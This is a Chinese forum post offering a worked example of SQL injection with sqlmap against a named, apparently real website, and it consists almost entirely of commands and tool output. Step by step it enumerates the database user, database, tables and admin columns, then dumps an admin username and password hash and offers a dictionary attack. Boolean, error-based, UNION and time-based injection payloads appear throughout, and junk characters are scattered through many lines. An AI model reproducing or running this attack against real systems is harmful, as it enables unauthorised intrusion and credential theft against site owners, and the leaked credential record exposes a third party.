标题: sqlmap实例注入mysql [打印本页] 作者: admin 时间: 2013-4-4 22:18 标题: sqlmap实例注入mysql D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! X `& ]$ ]0 t, y. o" C! d( v% W
ms "Mysql" --current-user /* 注解:获取当前用户名称- r- j- l c3 Q& \! G
sqlmap/0.9 - automatic SQL injection and database takeover tool 3 q! i2 t8 p8 h8 m9 @. S7 {: {http://sqlmap.sourceforge.net
starting at: 16:53:54 ( F* J) c* I! x% E1 C8 K7 C* L2 Z; H[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as 9 ]- m5 _& D9 V$ k session file 6 h: i2 ]% m5 R f- N( n7 ?[16:53:54] [INFO] resuming injection data from session file 2 ?3 O- @! ?, ]7 K, c8 f' _[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file% q- H0 a6 B/ W" O2 _
[16:53:54] [INFO] testing connection to the target url8 t$ \, {/ \: Z8 e
sqlmap identified the following injection points with a total of 0 HTTP(s) reque * R3 u& v+ q, Msts:7 `# i; n; y4 G0 F2 M
--- 0 K% f3 n4 k) s; _/ U4 G/ QPlace: GET4 {6 `- p. b: j
Parameter: id. x8 Y( q0 Z8 O1 g, P8 q% }; C/ C
Type: boolean-based blind $ L* F3 i" }+ f' w) d Title: AND boolean-based blind - WHERE or HAVING clause2 A. }7 F' h( D$ q
Payload: id=276 AND 799=799) k2 ~% s: B0 `7 Z9 _
Type: error-based 2 S* W& C: m4 L0 Q8 K8 Y2 N Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause # D5 R) ~2 _$ b7 c: P" X. w Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, 9 f) q2 ~9 R4 L" L c4 ]120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58+ f; }1 u- Y( ?, x" j
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) & H: _' ` Q X* i$ B, O7 U Type: UNION query . Q* {# A4 N9 L3 k2 ~ Title: MySQL UNION query (NULL) - 1 to 10 columns" P9 h% U) ~5 o4 s+ r: X3 c
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR . F* @( v+ {% K1 p7 N8 K5 _(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), # ^2 c5 |- T# w5 J" CCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# 3 o; I7 |. J- H0 H% s: [# E Type: AND/OR time-based blind. e1 C( ^; E n0 v% y3 B
Title: MySQL > 5.0.11 AND time-based blind 1 g7 ]" z4 D4 ] Payload: id=276 AND SLEEP(5) 7 D, Z0 r$ \4 m" |' C) ^--- 5 C3 n- p1 o( b+ {' b7 j[16:53:55] [INFO] the back-end DBMS is MySQL4 Q' t: @" o+ j3 Z1 n; e
web server operating system: Windows, e& W! T% b8 y
web application technology: Apache 2.2.11, PHP 5.3.0" u- }, O; B4 n! ]1 f- r3 x7 r
back-end DBMS: MySQL 5.0$ G2 @ J* d4 m7 V$ B/ x# D
[16:53:55] [INFO] fetching current user " ^: k- z1 h( u; y$ \+ \current user: 'root@localhost' , v7 x+ O8 x" R- K( [
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou, g, i2 l9 |* C' }3 h# M8 j
tput\www.wepost.com.hk'
shutting down at: 16:53:585 A! ^; U& X j, k7 S7 q* p
1 w; L( q! }( x- K
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db9 P. f; l6 N( I- _4 u
ms "Mysql" --current-db /*当前数据库" O( a" |& w, I6 ~
sqlmap/0.9 - automatic SQL injection and database takeover tool( k/ Q0 x7 W9 {- \9 W% M http://sqlmap.sourceforge.net
starting at: 16:54:16 4 y2 l7 c, {/ \- i[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 [% n$ K! `: v5 i
session file$ y) V3 }9 T% a% M! |$ t
[16:54:16] [INFO] resuming injection data from session file" x% n1 H$ o& |4 T6 E+ i
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file% i$ c( q( a: P. X
[16:54:16] [INFO] testing connection to the target url 4 I9 t6 P; g- [* ]sqlmap identified the following injection points with a total of 0 HTTP(s) reque , H- f+ y" f! J! q1 P1 bsts: & V; W4 B9 ]: U: [ C---# e* Y1 f3 y( j( x
Place: GET4 F! K; I2 \: @ v1 n5 q
Parameter: id " Z9 y5 M& ?4 K2 z* I& L0 P* U/ i Type: boolean-based blind 1 M+ ?% [( ?& {1 w8 t Title: AND boolean-based blind - WHERE or HAVING clause * X2 A+ k" k% x: u! s0 Y P/ Q Payload: id=276 AND 799=799 M& `' R7 H' K. R+ W! K4 p
Type: error-based: F8 Z6 r( R2 F" V4 H) k+ b; T
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause 7 T8 y/ t, F* v7 Z& Z9 N. W Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, 9 Y& F) M( m1 o120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58. }( z C; ~8 {/ M; l( E8 W) A+ |
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 |3 S5 l& s; w* ?* c! i% r
Type: UNION query) v8 D7 V% h' v& E& G6 ?
Title: MySQL UNION query (NULL) - 1 to 10 columns - g( g4 a) K8 q' ]5 H Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR . d2 @% C/ z# W(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), 6 u) m b- \9 R& ~8 ACHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#1 N( U1 y3 g* ~
Type: AND/OR time-based blind % E9 G# a3 L, u! L" p: e N Title: MySQL > 5.0.11 AND time-based blind . a' x8 h1 D- m Payload: id=276 AND SLEEP(5) ) |; p: u: P# W- z$ b1 i---+ A9 d% Y7 \0 r
[16:54:17] [INFO] the back-end DBMS is MySQL# H" H3 E( q$ P' i+ g8 e0 S' `
web server operating system: Windows 8 h$ }. u9 V% K3 dweb application technology: Apache 2.2.11, PHP 5.3.02 O1 I# @4 E# y& h7 _7 o# _3 b1 x1 g
back-end DBMS: MySQL 5.0 _2 `' [" T/ U
[16:54:17] [INFO] fetching current database+ n8 Z R6 h+ p
current database: 'wepost' 7 K8 V& y9 F, p% T( m: \& ~+ T( R[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou* d/ _4 F" X0 M' r! r0 ]" G
tput\www.wepost.com.hk'
shutting down at: 16:54:187 O i: ?) |9 N( M6 q2 }1 d
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db& a" K4 J: ]! w: M9 v
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名 z; E6 c- K2 x" B g sqlmap/0.9 - automatic SQL injection and database takeover tool 7 k. [4 I$ _( {- D, [) e+ ]& shttp://sqlmap.sourceforge.net
starting at: 16:55:25 4 H Q; j" X+ l- p5 q7 d[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as8 D8 {0 b; ~- W3 M: f0 \/ f
session file % O8 c/ ~; M, c3 G4 c5 a[16:55:25] [INFO] resuming injection data from session file: `7 M' Y, M) y- \( } N
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file 2 _' ~$ q4 r0 S[16:55:25] [INFO] testing connection to the target url% n9 S8 T3 f' x2 r# W6 o- V
sqlmap identified the following injection points with a total of 0 HTTP(s) reque* X: [! @8 h; e
sts: ( k3 D$ j8 E* j--- ' f; N( s+ _( _' ~+ B9 PPlace: GET; T1 S% H1 `- w) b# k
Parameter: id ( J' _8 z3 F" ]' s3 U; Y Type: boolean-based blind- p. X( u2 z# h/ t& I/ X, Z
Title: AND boolean-based blind - WHERE or HAVING clause ( F m! l; O* O0 N X+ D _& A' P Payload: id=276 AND 799=799 4 M. e/ u( h c% O* M( O( L Type: error-based 6 d c$ ~8 M3 S% W Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause 8 g3 x, Z; g5 E$ W4 @7 t4 X Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, , e3 G9 r" ^$ l M- F V/ Q120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 $ W% h i0 f3 }# P),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) / g' ~% @5 [8 z& e: _ Type: UNION query 9 y- D: q% [: d" _ Title: MySQL UNION query (NULL) - 1 to 10 columns" |& {( G; z/ H9 ^" A1 O
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR - o5 a8 `$ j* ~1 N* {(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), 3 @$ v0 |- M" I5 }, s% u) T) s$ TCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#$ i7 R0 i0 c' U! G7 h
Type: AND/OR time-based blind . C" Z! L. e1 l Title: MySQL > 5.0.11 AND time-based blind5 |, D- Q" w7 i% U: q: _+ _" c
Payload: id=276 AND SLEEP(5) + @- m! ?% |9 ?- s---5 c9 b* m! n. ^: v" q& l( b
[16:55:26] [INFO] the back-end DBMS is MySQL9 T# R" r. x2 z( ?* D
web server operating system: Windows 8 R A, B% C% I7 N& E6 Tweb application technology: Apache 2.2.11, PHP 5.3.01 z( o2 }" R4 _4 v" \' J' D( K% {$ ]2 L; V
back-end DBMS: MySQL 5.0 : f. j, e# d" ^6 c2 w; R) d: B3 V[16:55:26] [INFO] fetching tables for database 'wepost'! @$ H7 S0 T1 H) Q9 m
[16:55:27] [INFO] the SQL query used returns 6 entries) D$ ^+ X$ e T2 n/ X
Database: wepost & \! Z& k( R+ x! S0 L1 M& L[6 tables]) i' ^. y) i B. U
+-------------+ ! ?5 b. t9 h3 }8 A# P% z Q" e1 G| admin |- N' o% n4 N: {) E
| article |1 @( x, U5 _- Q w4 ?
| contributor | 8 x4 Q+ n* M' H2 [: R2 } o' \- s| idea |9 C0 Z& f2 O v( D! L; ~
| image | w4 y- v5 M& j" X! [' D| issue |* T- M$ C+ A) ?- A3 c; `3 N/ V
+-------------+0 N- G; C, K4 _" _, x9 l
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou/ G4 b3 G' `$ _6 r, i9 C6 l C
tput\www.wepost.com.hk'
shutting down at: 16:55:33) I3 z5 O3 m2 ?8 P
# g6 n* E( ?4 O9 W
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db 9 ]1 t# F6 |% t+ H* M' |ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名 " |$ d5 L2 o# @. y, P- b, a% n sqlmap/0.9 - automatic SQL injection and database takeover tool, b, S5 y( T3 w! w+ y( D- [# ? http://sqlmap.sourceforge.net
starting at: 16:56:06 . O8 ~7 v3 H8 U; a& Bsqlmap identified the following injection points with a total of 0 HTTP(s) reque 9 k, p, d. y8 H% B; O# Qsts:4 \7 I. y7 ]. Z
--- 1 ]" z5 z' g2 y9 d8 L ]0 `Place: GET7 \8 [6 |& S* z2 e! q
Parameter: id% P& ]8 O* K9 N
Type: boolean-based blind R% `. K- e$ U$ p
Title: AND boolean-based blind - WHERE or HAVING clause4 K6 N) S9 j, k# G8 `
Payload: id=276 AND 799=799 - z5 P4 H$ @9 S9 K Type: error-based / o8 Q" O% `+ e4 V! ^; ]' ` Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause5 N9 @; r7 N6 Y- l/ Q: d7 C
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118, 6 e% t A4 Z& w! y8 d120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 L9 P8 `9 i. R0 Z, ^' L! U),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) ) u( M5 q7 c, z8 O: m, V Type: UNION query4 S b8 n4 M! h8 B; e! _) X
Title: MySQL UNION query (NULL) - 1 to 10 columns ; C/ V* w& E f V Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR4 j% a$ L Q3 P/ K. O
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), 9 `1 `3 b4 p3 A; h& i% |9 rCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: K- U: | e: R
Type: AND/OR time-based blind 8 a) g/ k( d( e2 n# _/ x Title: MySQL > 5.0.11 AND time-based blind2 j% V& D; P* m; I7 `; f
Payload: id=276 AND SLEEP(5)2 V8 a/ e; P: U" @: [
--- 9 c. B& L9 Z3 o. V1 V- j' X/ U3 qweb server operating system: Windows 8 ?" z" X/ ~6 J7 @web application technology: Apache 2.2.11, PHP 5.3.0& p& o* J1 f `
back-end DBMS: MySQL 5.0& U2 e9 v3 U. j0 I% [1 d( K
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se1 U2 L5 C& N$ F1 f+ d" V+ {
ssion': wepost, wepost- m; h0 O. }9 s% ]2 }' G
Database: wepost ^8 L% Q* B7 T$ Z
Table: admin 2 r' c! F7 S: }[4 columns]; l' E/ p0 F2 r: o) F# F
+----------+-------------+ , r! E) K6 k# f( @0 k# W| Column | Type |4 j0 _" M+ l7 \
+----------+-------------+ 1 d& _8 x1 ~/ g2 ~+ \| id | int(11) | / v9 y: W6 L2 r* h| password | varchar(32) |+ b6 G K4 c' O
| type | varchar(10) |4 [, W }: U; K: T# q" a% \
| userid | varchar(20) |% K: F6 N7 [% [8 T2 ?
+----------+-------------+! Q% \7 s; K8 \; G8 N
shutting down at: 16:56:19 0 p' O+ ? E6 q% t5 A. H 4 m0 [$ o& d& X' ]D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db - y$ a5 f, c& W: hms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容$ r& d$ I; \: p) D( X
sqlmap/0.9 - automatic SQL injection and database takeover tool " B- O/ X. g- jhttp://sqlmap.sourceforge.net
starting at: 16:57:147 h( D; d) Q- P; u2 L, \) C0 C6 C
sqlmap identified the following injection points with a total of 0 HTTP(s) reque R: ~0 Z5 j) ]sts:' k& k& M' S" F' t8 D
---& Y) C2 m6 d: v: y
Place: GET# i) _4 _; k, M. R2 H e& n
Parameter: id. E2 m ^3 n v' ?
Type: boolean-based blind) n- M. q8 H7 \) `" A6 H+ j
Title: AND boolean-based blind - WHERE or HAVING clause+ K2 U7 }1 J2 L! o
Payload: id=276 AND 799=799" g5 r' G& R& i# b4 C
Type: error-based, Z* c- y; d* U& c
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) C- h j! S0 v7 {( f# |$ Y1 |
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 u+ `( o% N# x9 v( @/ m
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58* @8 u- m9 a; o9 a' |6 s
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) : z- |7 j+ S$ Q5 j' L% a Type: UNION query6 b; W: a5 i$ d' n% J
Title: MySQL UNION query (NULL) - 1 to 10 columns 2 [- [4 T4 Y, f; c' ]9 X y: C b Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR 8 y; O. s1 U' C- |(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR), 0 K: z0 W [7 @' R, I$ TCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# u. { |& O. X- x5 O& U2 Z. t Type: AND/OR time-based blind5 V' f$ ?3 Z$ d( V* V0 n
Title: MySQL > 5.0.11 AND time-based blind' p ^( j3 p1 V' Q) z, h
Payload: id=276 AND SLEEP(5) $ y5 L, K( N+ i; X& x/ ]3 e: ^- `--- C& j# X7 [$ s
web server operating system: Windows8 A; X5 ~' H# K- j M- M8 w9 c
web application technology: Apache 2.2.11, PHP 5.3.0" l; C6 q+ E, T- d9 r8 w M% I
back-end DBMS: MySQL 5.0 p0 ~( a, m8 t) B k1 C1 z/ @
recognized possible password hash values. do you want to use dictionary attack o2 J. j, D- d" Q* H$ G
n retrieved table items? [Y/n/q] y* N4 w! l( d% v# e9 C
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]4 C, ?9 ^% i0 M- r8 d
do you want to use common password suffixes? (slow!) [y/N] y / W! ]) a. b$ PDatabase: wepost & q. n% t% m5 z4 ]' R! V% B8 A% cTable: admin + h' \7 i6 ], L+ }! S[1 entry] - F" N, W& A) S% X9 j W3 F' ]# {! e; x( J+----------------------------------+------------+" \1 ]* p8 V h m
| password | userid | , [" Y: e' `* K3 p' ]& F) ~+----------------------------------+------------+ 4 ?! u( V; d; B# X# @9 M: ]| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |: D" M! f. k) i( l3 X% ^& n: Y! m' ?
+----------------------------------+------------+7 N! ^9 P. s" m0 M$ W2 s; @
shutting down at: 16:58:14 ) f9 N( a3 C* r2 @9 S( l! O, F 7 }! [6 `' [% fD:\Python27\sqlmap>